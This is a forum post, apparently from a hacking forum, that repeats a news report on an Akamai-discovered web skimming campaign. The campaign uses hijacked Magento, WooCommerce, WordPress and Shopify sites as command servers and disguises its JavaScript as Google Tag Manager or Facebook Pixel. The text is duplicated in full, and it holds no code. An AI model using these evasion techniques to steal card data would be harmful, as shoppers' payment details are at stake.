Lord777
Professional
- Messages
- 2,577
- Reaction score
- 1,563
- Points
- 113
Hackers use companies 'trust to steal their customers' data.
Information security specialists from Akamai discovered a new web skimming campaign that uses infected sites as command and control servers (C2 server) for attacks.
A web skimmer is malicious code embedded in payment pages to steal personal and credit card information from site customers. Since the code is executed on the client side, malicious behavior is not detected by firewalls and other server protection tools.
The detected campaign differs in that it relies on infected legitimate sites to make the traffic look authentic. Since sites usually operate as legitimate companies, they arouse less suspicion in the victim. Target sites run on the CMS systems Magento, WooCommerce, WordPress, and Shopify, but contain a number of vulnerabilities.
Some of the infected sites are visited by hundreds of thousands of visitors a month, who can potentially have their payment and personal data stolen. Especially considering that the campaign went unnoticed for almost a month for many victims.
In the campaign, legitimate sites that are hijacked to host malicious code act as the attacker's C2 server. Also, instead of directly injecting code into the site's resources, attackers use small pieces of JavaScript code that download the full malicious code from another infected company site, which allows hackers to hide most of the malicious code.
The malicious code is designed to mimic popular services like Google Tag Manager or Facebook * Pixel. This method is popular among web skimmers because it helps malicious code "blend in" with its surroundings, masking its true intentions.
Information security specialists from Akamai discovered a new web skimming campaign that uses infected sites as command and control servers (C2 server) for attacks.
A web skimmer is malicious code embedded in payment pages to steal personal and credit card information from site customers. Since the code is executed on the client side, malicious behavior is not detected by firewalls and other server protection tools.
The detected campaign differs in that it relies on infected legitimate sites to make the traffic look authentic. Since sites usually operate as legitimate companies, they arouse less suspicion in the victim. Target sites run on the CMS systems Magento, WooCommerce, WordPress, and Shopify, but contain a number of vulnerabilities.
Some of the infected sites are visited by hundreds of thousands of visitors a month, who can potentially have their payment and personal data stolen. Especially considering that the campaign went unnoticed for almost a month for many victims.
In the campaign, legitimate sites that are hijacked to host malicious code act as the attacker's C2 server. Also, instead of directly injecting code into the site's resources, attackers use small pieces of JavaScript code that download the full malicious code from another infected company site, which allows hackers to hide most of the malicious code.
The malicious code is designed to mimic popular services like Google Tag Manager or Facebook * Pixel. This method is popular among web skimmers because it helps malicious code "blend in" with its surroundings, masking its true intentions.
